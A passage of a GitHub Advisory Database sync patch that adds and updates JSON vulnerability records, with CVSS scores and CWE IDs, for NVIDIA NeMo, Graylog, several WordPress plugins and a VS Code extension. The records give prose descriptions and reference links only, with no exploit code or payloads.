"severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T15:24:43Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0a0ba0fbbcef82bb8162806cb464536c5fcecc15 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:33:14 +0000 Subject: [PATCH 006/174] Advisory Database Sync --- .../GHSA-65c5-j3wr-v7fh.json | 6 +- .../GHSA-8jj6-9qc9-r5x4.json | 3 +- .../GHSA-25w3-5rm9-v4wm.json | 40 +++++++++++++ .../GHSA-2cpx-h862-rqm6.json | 40 +++++++++++++ .../GHSA-3crm-x896-j73p.json | 36 +++++++++++ .../GHSA-47m2-7g75-xvrp.json | 36 +++++++++++ .../GHSA-49xw-73mm-8fw9.json | 36 +++++++++++ .../GHSA-4m8q-p6h8-x2wj.json | 4 +- .../GHSA-54p7-3rpx-pjfc.json | 48 +++++++++++++++ .../GHSA-568p-hhxc-vvx8.json | 15 +++-- .../GHSA-5fc6-h8m7-2wfc.json | 4 +- .../GHSA-5g82-gg27-r8vp.json | 15 +++-- .../GHSA-5hp8-hwcv-h225.json | 36 +++++++++++ .../GHSA-5rm9-pcp8-m6v8.json | 40 +++++++++++++ .../GHSA-6jg9-x4w8-gj7j.json | 4 +- .../GHSA-6qr6-c44j-c793.json | 60 +++++++++++++++++++ .../GHSA-74jq-6q38-p5wf.json | 4 +- .../GHSA-77vx-jc7r-586m.json | 37 ++++++++++++ .../GHSA-787p-86v4-hhfg.json | 33 ++++++++++ .../GHSA-78p6-wh6m-9r9w.json | 36 +++++++++++ .../GHSA-7jfh-hm8h-m5rq.json | 4 +- .../GHSA-85h6-5m3v-gx37.json | 29 +++++++++ .../GHSA-87ff-rq35-47jj.json | 36 +++++++++++ .../GHSA-8rh3-rvv2-3mr4.json | 4 +- .../GHSA-933h-c422-j33j.json | 40 +++++++++++++ .../GHSA-9379-mwvr-7wxx.json | 40 +++++++++++++ .../GHSA-964f-vc2f-ch6j.json | 15 +++-- .../GHSA-c5gg-v573-hv7f.json | 33 ++++++++++ .../GHSA-cf26-rj67-f4wr.json | 36 +++++++++++ .../GHSA-cw7v-qx8m-563q.json | 36 +++++++++++ .../GHSA-f7cx-4c4g-9g59.json | 36 +++++++++++ .../GHSA-f86v-54pm-58q4.json | 40 +++++++++++++ .../GHSA-ff7j-jwgr-hgxp.json | 36 +++++++++++ .../GHSA-fjxh-qxr5-g7j4.json | 45 ++++++++++++++ .../GHSA-fqmg-pv5x-v55p.json | 40 +++++++++++++ .../GHSA-g5pw-hppv-79r6.json | 37 ++++++++++++ .../GHSA-gcr4-23wm-438x.json | 40 +++++++++++++ .../GHSA-ghfm-hghj-9j75.json | 15 +++-- .../GHSA-h85r-3jrw-9546.json | 37 ++++++++++++ .../GHSA-hr8m-gc74-4f7w.json | 4 +- .../GHSA-hr98-gm7c-926r.json | 37 ++++++++++++ .../GHSA-hvjw-vp7g-39h5.json | 40 +++++++++++++ .../GHSA-j9p7-7ww6-3mjx.json | 40 +++++++++++++ .../GHSA-jfq5-qg8x-7rmp.json | 53 ++++++++++++++++ .../GHSA-jxgv-6j54-wwc7.json | 56 +++++++++++++++++ .../GHSA-m8v3-m8mg-rrc7.json | 33 ++++++++++ .../GHSA-mx8g-qc6m-wcmf.json | 33 ++++++++++ .../GHSA-p4q3-g549-vvfc.json | 44 ++++++++++++++ .../GHSA-pc38-57g8-39gg.json | 15 +++-- .../GHSA-phqg-p332-q7vc.json | 45 ++++++++++++++ .../GHSA-q543-x74m-r8q9.json | 4 +- .../GHSA-qq2v-q6qr-p5vx.json | 40 +++++++++++++ .../GHSA-qq7g-427f-cm2r.json | 56 +++++++++++++++++ .../GHSA-r264-whc7-wwfw.json | 33 ++++++++++ .../GHSA-r4m3-cm43-fxrj.json | 48 +++++++++++++++ .../GHSA-r77x-pqm4-6252.json | 36 +++++++++++ .../GHSA-rgjw-pqcr-56gf.json | 36 +++++++++++ .../GHSA-rjm5-gmfm-6cp4.json | 60 +++++++++++++++++++ .../GHSA-rv75-v2gv-p54c.json | 40 +++++++++++++ .../GHSA-rvhp-mghq-8mvw.json | 15 +++-- .../GHSA-vfmw-4jmp-wmrw.json | 36 +++++++++++ .../GHSA-vqcj-rgfw-jjcq.json | 37 ++++++++++++ .../GHSA-vw84-mx3m-hw5p.json | 48 +++++++++++++++ .../GHSA-vwcq-x7gx-g26f.json | 36 +++++++++++ .../GHSA-wfhp-qgm8-5p5c.json | 29 +++++++++ .../GHSA-whmh-gx62-v47m.json | 36 +++++++++++ .../GHSA-wq2g-h2h9-v8x3.json | 36 +++++++++++ .../GHSA-wvvh-pcq5-hc6f.json | 40 +++++++++++++ .../GHSA-ww2j-3p54-3m69.json | 44 ++++++++++++++ .../GHSA-x536-g6fc-g963.json | 36 +++++++++++ 70 files changed, 2244 insertions(+), 34 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json create mode 100644 advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json diff --git a/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json b/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json index 01cd958178615..2238032141356 100644 --- a/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json +++ b/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-65c5-j3wr-v7fh", - "modified": "2025-12-15T12:30:27Z", + "modified": "2026-02-18T15:31:23Z", "published": "2025-12-15T12:30:27Z", "aliases": [ "CVE-2025-14714" ], "details": "An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle\n\n\n\n\nBy executing the bundled interpreter directly the attacker's scripts run with the application's TCC privileges\n\n\n\n\nIn fixed versions parent-constraints are used to allow only the main application to launch interpreter with those permissions\n\nThis issue affects LibreOffice on macOS: from 25.2 before < 25.2.4.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json b/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json index 903dee9e88dfb..0504fcb51c51b 100644 --- a/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json +++ b/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json b/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json new file mode 100644 index 0000000000000..2addfc455c227 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25w3-5rm9-v4wm", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33246" + ], + "details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, or information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33246" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33246" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json b/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json new file mode 100644 index 0000000000000..a1c64fdff3b74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cpx-h862-rqm6", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33243" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33243" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json new file mode 100644 index 0000000000000..f16f154739d21 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3crm-x896-j73p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1435" + ], + "details": "Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or leaked 'sessionId' can continue to be used to authenticate valid requests. Exploiting this vulnerability would allow an attacker with access to the web service/API network (port 9000 or HTTP/S endpoint of the server) to reuse an old session token to gain unauthorized access to the application, interact with the API/web, and compromise the integrity of the affected account.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1435" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json new file mode 100644 index 0000000000000..92410cc1fc832 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47m2-7g75-xvrp", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1440" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/pipelines/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1440" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json new file mode 100644 index 0000000000000..3e7b6867826cb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49xw-73mm-8fw9", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1439" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/\n\nalerts\n\n/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1439" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json index 406dcef173473..bd3247190334c 100644 --- a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json +++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json @@ -41,7 +41,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json b/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json new file mode 100644 index 0000000000000..ad028655b3deb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54p7-3rpx-pjfc", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-1317" + ], + "details": "The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 7.37. This is due to insufficient escaping on the `file_name` parameter which is stored in the database during file upload and later used in raw SQL queries without proper sanitization. This makes it possible for authenticated attackers with Subscriber-level access or higher to append additional SQL queries into already existing queries via a malicious filename, which can be used to extract sensitive information from the database. The vulnerability can only be exploited when the 'Single Import/Export' option is enabled, and the server is running a PHP version < 8.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1317" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/managerExtensions/LogManager.php#L763" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L181" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3445414" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd80133d-03c7-4ecb-ad2c-98950f788ca6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json index 85d2b669e2761..38232cd095362 100644 --- a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json +++ b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-568p-hhxc-vvx8", - "modified": "2026-02-18T06:30:19Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-18T06:30:19Z", "aliases": [ "CVE-2026-1368" ], "details": "The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T06:16:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json index 8b64705509c5c..3fe6391c73d04 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json +++ b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json b/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json index d65089f4f0cde..97ce98067f1f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json +++ b/advisories/unreviewed/2026/02/GHSA-5g82-gg27-r8vp/GHSA-5g82-gg27-r8vp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5g82-gg27-r8vp", - "modified": "2026-02-16T18:31:28Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-16T18:31:28Z", "aliases": [ "CVE-2025-65715" ], "details": "An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-16T16:19:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json new file mode 100644 index 0000000000000..57e5554fcf326 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5hp8-hwcv-h225", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1437" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's 